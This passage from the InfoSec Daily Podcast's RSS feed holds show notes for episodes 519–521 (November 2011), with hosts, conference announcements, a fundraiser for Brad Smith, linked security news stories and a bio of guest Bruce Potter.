<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.infosecisland.com/blogview/18077-FBI-Claims-Biggest-Cybercrime-Takedown-in-History.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/blogview/18077-FBI-Claims-Biggest-Cybercrime-Takedown-in-History.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://lists.immunityinc.com/pipermail/dailydave/2011-November/000361.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://lists.immunityinc.com/pipermail/dailydave/2011-November/000361.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hide yo kids, hide yo wife, they hackin&rsquo; everbody.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/tech-policy/news/2011/11/the-borderless-internet-is-officially-dead.ars"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2011/11/the-borderless-internet-is-officially-dead.ars</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/microsoft/news/2011/11/why-microsoft-authorized-a-9-windows-phone-jailbreak.ars"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/microsoft/news/2011/11/why-microsoft-authorized-a-9-windows-phone-jailbreak.ars</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.pcadvisor.co.uk/news/security/3316651/smartphone-malware-surges-by-800-in-four-months/?olo=rss"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3316651/smartphone-malware-surges-by-800-in-four-months/?olo=rss</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://convergence.io/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://convergence.io/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;ve released Convergence 0.08, with support for Firefox 8 and client certificates!</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.schneier.com/blog/archives/2011/11/weaponized_uav.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.schneier.com/blog/archives/2011/11/weaponized_uav.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.copblock.org/9916/the-police-state-grows-tsa-expands-past-airports/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.copblock.org/9916/the-police-state-grows-tsa-expands-past-airports/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://yro.slashdot.org/story/11/11/12/1738201/judges-makes-divorcing-couple-swap-facebook-passwords"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://yro.slashdot.org/story/11/11/12/1738201/judges-makes-divorcing-couple-swap-facebook-passwords</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-521-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3127/0/infosec-daily-podcast-episode521.mp3.mp3" length="79385337" type="audio/mpeg" />
		<itunes:duration>0:55:08</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 521 for November 12, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
	Guests: Warrax, Hackett, Spridel, and Oncee.

	Brad Smith (theNurse) and his stroke at Hacker Halted:
	W[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 521 for November 12, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
	Guests: Warrax, Hackett, Spridel, and Oncee.

	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/

	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.infosecisland.com/blogview/18077-FBI-Claims-Biggest-Cybercrime-Takedown-in-History.html
	Source: https://lists.immunityinc.com/pipermail/dailydave/2011-November/000361.html
	Hide yo kids, hide yo wife, they hackin&#8217; everbody.
	Source: http://arstechnica.com/tech-policy/news/2011/11/the-borderless-internet-is-officially-dead.ars
	Source: http://arstechnica.com/microsoft/news/2011/11/why-microsoft-authorized-a-9-windows-phone-jailbreak.ars
	Source: http://www.pcadvisor.co.uk/news/security/3316651/smartphone-malware-surges-by-800-in-four-months/?olo=rss
	Source: http://convergence.io/
	We&#39;ve released Convergence 0.08, with support for Firefox 8 and client certificates!
	Source: https://www.schneier.com/blog/archives/2011/11/weaponized_uav.html
	Source: http://www.copblock.org/9916/the-police-state-grows-tsa-expands-past-airports/
	Source: http://yro.slashdot.org/story/11/11/12/1738201/judges-makes-divorcing-couple-swap-facebook-passwords</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 520 &#8211; Interview with Bruce Potter (@gdead)</title>
		<link>http://www.isdpodcast.com/episode-520-interview-with-bruce-potter-gdead</link>
		<comments>http://www.isdpodcast.com/episode-520-interview-with-bruce-potter-gdead#comments</comments>
		<pubDate>Sat, 12 Nov 2011 02:10:06 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3122</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 520 for November 11, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma. Special Guest: Bruce Potter Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 520 for November 11, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Special Guest: Bruce Potter</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/28563447/BSidesDelaware"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/28563447/BSidesDelaware</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Interview with Bruce Potter (@gdead). &nbsp;Bruce is the founder of The Shmoo Group, which is an international organization formed in the late 1990s as a non-profit security think-tank. &nbsp;&nbsp;</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Shmoo Group is comprised of security professionals from around the world who donate their free time and energy to information security research and development. &nbsp;Their projects are well known and respected in the industry, such as </span><a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ShmooCon</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Rainbow tables, AirSnort, bluesniff</span><span style="font-size:11pt;font-family:Arial;color:#404040;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">airsnarf, and osiris</span><span style="font-size:11pt;font-family:Arial;color:#404040;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to name a few. &nbsp;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As if that&rsquo;s not enough, Bruce is also the founder and CTO of </span><a href="http://www.pontetec.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Ponte Technologies</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a company focused on advanced IT security technologies. &nbsp;And last but certainly not least he&rsquo;s a cyclist.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-520-interview-with-bruce-potter-gdead/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3122/0/infosec-daily-podcast-episode-520.mp3" length="24078836" type="audio/mpeg" />
		<itunes:duration>0:50:03</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 520 for November 11, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Bruce Potter
	Announcements:
	Brad Smith (t[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 520 for November 11, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Bruce Potter
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BSides Delaware
	When: November 11-12th, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/28563447/BSidesDelaware
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34; 
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	You don't have a sufficient version of Flash Player to display this animation.
	Interview with Bruce Potter (@gdead). &#160;Bruce is the founder of The Shmoo Group, which is an international organization formed in the late 1990s as a non-profit security think-tank. &#160;&#160;The Shmoo Group is comprised of security professionals from around the world who donate their free time and energy to information security research and development. &#160;Their projects are well known and respected in the industry, such as ShmooCon, Rainbow tables, AirSnort, bluesniff, airsnarf, and osiris, to name a few. &#160;
	As if that&#8217;s not enough, Bruce is also the founder and CTO of Ponte Technologies, a company focused on advanced IT security technologies. &#160;And last but certainly not least he&#8217;s a cyclist.</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 519 &#8211; Infosec Whiners, Rogue Risk Manager, Steve Was Right,  Comcast’s Native IPv6 and 5 iOS Tips</title>
		<link>http://www.isdpodcast.com/episode-519-infosec-whiners-rogue-risk-manager-steve-was-right-comcast%e2%80%99s-native-ipv6-and-5-ios-tips</link>
		<comments>http://www.isdpodcast.com/episode-519-infosec-whiners-rogue-risk-manager-steve-was-right-comcast%e2%80%99s-native-ipv6-and-5-ios-tips#comments</comments>
		<pubDate>Fri, 11 Nov 2011 01:51:19 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3117</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 519 for November 10, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan. Announcements: Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<div><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 519 for November 10, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik and Karthik Rangarajan.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12th, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/28563447/BSidesDelaware"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/28563447/BSidesDelaware</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
